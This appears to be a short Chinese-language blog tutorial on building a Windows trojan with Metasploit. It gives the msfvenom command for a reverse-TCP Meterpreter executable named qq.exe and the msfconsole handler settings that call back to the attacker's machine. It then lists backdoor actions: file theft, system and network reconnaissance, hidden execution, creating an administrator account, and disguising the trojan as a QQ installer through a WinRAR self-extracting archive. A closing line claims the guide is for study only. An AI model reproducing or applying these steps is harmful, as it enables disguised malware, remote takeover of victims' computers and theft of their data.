文章目錄
- 1.生成木馬
- 2.啟動msfconsole
- 3.後門操作
-
- 3.1 檔案(檔案,目錄等)操作
- 3.2 網絡指令(net等)操作
- 3.3 系統指令(權限,使用者,使用者組等)操作
- 3.4 壓縮工具(zip/rar等等)僞裝操作
- 3.5 FTP服務
1.生成木馬
使用msf子產品中的msfvenom子產品,生成.exe木馬檔案
msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻擊主機IP位址 LPORT=4444 -f exe > /home/tim/桌面/qq.exe
![](https://img.laitimes.com/img/_0nNw4CM6IyYiwiM6ICdiwiIyVGduV2YfNWawNyZuBnL3UTO2UjNwYTM1ETMxAjMwIzLc52YucWbp5GZzNmLn9Gbi1yZtl2Lc9CX6MHc0RHaiojIsJye.png)
2.啟動msfconsole
msfconsole
設定payload參數
//開啟監聽
use exploit/multi/handler
//設定tcp監聽
set payload windows/meterpreter/reverse_tcp
//設定攻擊主機IP
set LHOST 攻擊主機IP位址
//設定監聽端口
set lport 4444
//執行
run
執行成功以後,建立Meterpreter會話。
3.後門操作
3.1 檔案(檔案,目錄等)操作
獲得工作目錄;列出目錄檔案
檢視檔案内容
下載下傳檔案到主機
編輯檔案
3.2 網絡指令(net等)操作
擷取目标主機上的網絡接口資訊
顯示目标主機的路由資訊
3.3 系統指令(權限,使用者,使用者組等)操作
獲得目标主機上正在運作的程序
執行目标主機的檔案(隐藏運作)
擷取目标主機系統資訊
建立使用者,并提權為管理者權限
3.4 壓縮工具(zip/rar等等)僞裝操作
Winrar制作自解壓檔案QQ安裝.exe(PS:生成木馬後建立自解壓檔案)
3.5 FTP服務
ftp://目标主機IP位址
上傳和下載下傳檔案
PS:僅供安全學習和教學用途,禁止非法使用。